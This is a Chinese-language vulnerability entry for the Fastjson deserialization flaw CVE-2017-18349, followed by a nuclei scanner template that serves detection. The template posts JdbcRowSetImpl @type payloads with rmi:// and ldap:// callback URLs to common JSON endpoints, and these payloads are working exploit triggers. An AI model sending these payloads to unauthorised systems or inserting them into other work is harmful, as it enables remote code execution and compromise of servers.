Fastjson 反序列化远程代码执行漏洞

漏洞信息

漏洞名称： Fastjson 反序列化远程代码执行漏洞

漏洞编号：

• CVE： CVE-2017-18349

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： Fastjson是阿里巴巴开源的一个高性能JSON处理库，广泛用于Java应用中的JSON序列化和反序列化。由于其高效和易用性，Fastjson被许多企业和开发者采用，特别是在Web应用和服务端开发中。

该漏洞存在于Fastjson 1.2.25之前的版本中，具体问题在于parseObject方法对@type注解的处理不当，导致攻击者可以通过构造恶意的JSON请求触发不安全的反序列化操作。特别是当JSON中包含恶意的JdbcRowSetImpl类时，可以利用Java的RMI或LDAP协议实现远程代码执行。这种漏洞的根本原因是Fastjson在反序列化过程中未对输入的@type注解进行严格的验证和过滤，使得攻击者可以指定任意类进行实例化。

成功利用此漏洞的攻击者可以在目标系统上执行任意代码，完全控制系统，访问敏感数据，甚至建立持久的后门。由于该漏洞可以通过网络远程利用，且不需要任何形式的认证，因此其危害性极高。攻击者只需发送特制的JSON请求到使用受影响Fastjson版本的应用，即可触发漏洞。这使得该漏洞特别适合自动化攻击和大规模利用，对使用Fastjson的应用构成了严重威胁。

产品厂商： alibaba

产品名称： fastjson

影响版本： version < 1.2.25

来源： https://github.com/projectdiscovery/nuclei-templates/blob/1aaaa356aeaef6348f0062b40e674fc67b0cd5ae/http%2Fcves%2F2017%2FCVE-2017-18349.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2017-18349

info:
  name: Fastjson Insecure Deserialization - Remote Code Execution
  author: night
  severity: critical
  description: |
    Fastjson before 1.2.25 contains a remote code execution vulnerability in parseObject method.
    The vulnerability allows remote attackers to execute arbitrary code via crafted JSON requests
    containing malicious @type annotations that trigger unsafe deserialization of JdbcRowSetImpl.
    This affects FastjsonEngine in Pippo 1.11.0 and other products using vulnerable Fastjson versions.
  impact: |
    Successful exploitation allows complete system compromise through remote code execution,
    enabling attackers to execute arbitrary commands, access sensitive data, and establish
    persistent backdoors on the target system.
  remediation: |
    Update Fastjson to version 1.2.25 or later which includes security patches for this vulnerability.
    Implement additional security measures: disable autotype functionality by setting fastjson.parser.autoTypeSupport=false,
    implement strict whitelist filtering for @type annotations, validate and sanitize all JSON input,
    use Web Application Firewalls (WAF) to filter malicious requests, and regularly audit dependencies
    for known vulnerabilities. Consider migrating to safer JSON parsing libraries like Jackson with
    secure configurations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18349
    - https://github.com/alibaba/fastjson/wiki/security_update_20170315
    - https://github.com/pippo-java/pippo/issues/466
    - https://github.com/h0cksr/Fastjson--CVE-2017-18349-
    - https://fortiguard.com/encyclopedia/ips/44059
    - https://www.exploit-db.com/exploits/45983
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-18349
    cwe-id: CWE-502
    cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:*
    epss-score: 0.97435
    epss-percentile: 0.99951
  metadata:
    verified: true
    max-request: 4
    vendor: alibaba
    product: fastjson
  tags: cve,cve2017,fastjson,deserialization,rce,critical,intrusive

variables:
  rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}"
  ldap_payload: "ldap://{{interactsh-url}}/{{randstr}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"

    headers:
      Content-Type: application/json
      Accept: application/json
      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"

    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{rmi_payload}}",
        "autoCommit": true
      }

    stop-at-first-match: true

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"

    extractors:
      - type: kval
        kval:
          - interactsh_ip
          - interactsh_request

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"

    headers:
      Content-Type: application/json
      Accept: application/json
      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"

    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{ldap_payload}}",
        "autoCommit": true
      }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"

    extractors:
      - type: kval
        kval:
          - interactsh_ip
          - interactsh_request

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"

    headers:
      Content-Type: application/json
      Accept: application/json
      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"

    body: |
      {
        "data": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{rmi_payload}}",
          "autoCommit": true
        }
      }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"

    extractors:
      - type: kval
        kval:
          - interactsh_ip
          - interactsh_request

  - method: POST
    path:
      - "{{BaseURL}}/json"

    headers:
      Content-Type: application/json
      Accept: application/json
      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"

    body: |
      {
        "b": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{ldap_payload}}",
          "autoCommit": true
        }
      }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"

    extractors:
      - type: kval
        kval:
          - interactsh_ip
          - interactsh_request